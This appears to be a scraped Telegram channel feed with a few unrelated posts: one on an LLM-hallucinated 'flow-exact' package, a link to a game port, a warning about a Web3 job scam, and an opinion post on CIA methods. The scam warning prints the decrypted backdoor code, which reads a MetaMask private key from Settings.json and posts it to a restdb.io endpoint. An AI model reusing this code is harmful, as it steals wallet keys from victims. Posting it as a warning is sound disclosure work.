Forwarded from mixtery
This media is not supported in your browser
VIEW IN TELEGRAM
One more example of our closest future. If you are looking for the flow's "exact type" (the statement that you can use to ensures that an object has only the properties explicitly defined; no more, no less) in Typescript, you could try searching for it using Google.
Unfortunately, the first result is the link to an article fully generated by LLM, and yes, the content is mirage / hallucination.
It refers to non-existent package flow-exact.
P.s.: the open question, what would be the quality of sources of the next generation of LLM?
(Source: private chat group)
Unfortunately, the first result is the link to an article fully generated by LLM, and yes, the content is mirage / hallucination.
It refers to non-existent package flow-exact.
P.s.: the open question, what would be the quality of sources of the next generation of LLM?
(Source: private chat group)
https://github.com/alexbatalov/fallout2-ce for MacOS and Linux
One more attack on Web3 dev.
An employer asks to add a simple feature to a ready-made Python product and sends an archive. Among the dependencies in the archive is a download of an encrypted backdoor. In the product's manual, it is stated that it is necessary to export the key from metamask and place it in Settings.json.
Then the decrypted code reads Settings.json and sends the saved parameters to the “hacker” API.
The decrypted code from getpip.py is:
Originally distributed from: https://github.com/DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts
Re-distributed by end-user into @eth_jobs by tg user: @Akhmed0201 (5234478521)
Stranger, remember, your key is your money.
An employer asks to add a simple feature to a ready-made Python product and sends an archive. Among the dependencies in the archive is a download of an encrypted backdoor. In the product's manual, it is stated that it is necessary to export the key from metamask and place it in Settings.json.
Then the decrypted code reads Settings.json and sends the saved parameters to the “hacker” API.
The decrypted code from getpip.py is:
B=len
import requests as C,json as A
D='https://mydatabase-a9f4.restdb.io/rest/test'
E={'content-type':'application/json','x-apikey':'65e98d7dd34bb073ba8ccdfc','cache-control':'no-cache'}
def H(s):
F=D+'?q={“s”: “‘+s+’”}';G=C.request('GET',F,headers=E);H=A.loads(G.text)
if B(H)>0:return True
else:return False
def F(k,s):B=A.dumps({'k':k,'s':s});C.post(D,data=B,headers=E)
def G():
With open('./Settings.json')as G:
C=A.load(G);D=C['metamask_address'];E=C['metamask_private_key']
if B(D)>0 and B(E)>0:F(D,E)
Originally distributed from: https://github.com/DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts
Re-distributed by end-user into @eth_jobs by tg user: @Akhmed0201 (5234478521)
Stranger, remember, your key is your money.
https://en.wikipedia.org/wiki/CIA_assassination_attempts_on_Fidel_Castro (RU) shows how the CIA may work right now. The USSR falls, KGB transformed, but CIA/NSA/another north intelligence still the same with the same opinions and methods. Amazing reading.
Wikipedia
CIA assassination attempts on Fidel Castro
U.S. CIA attempts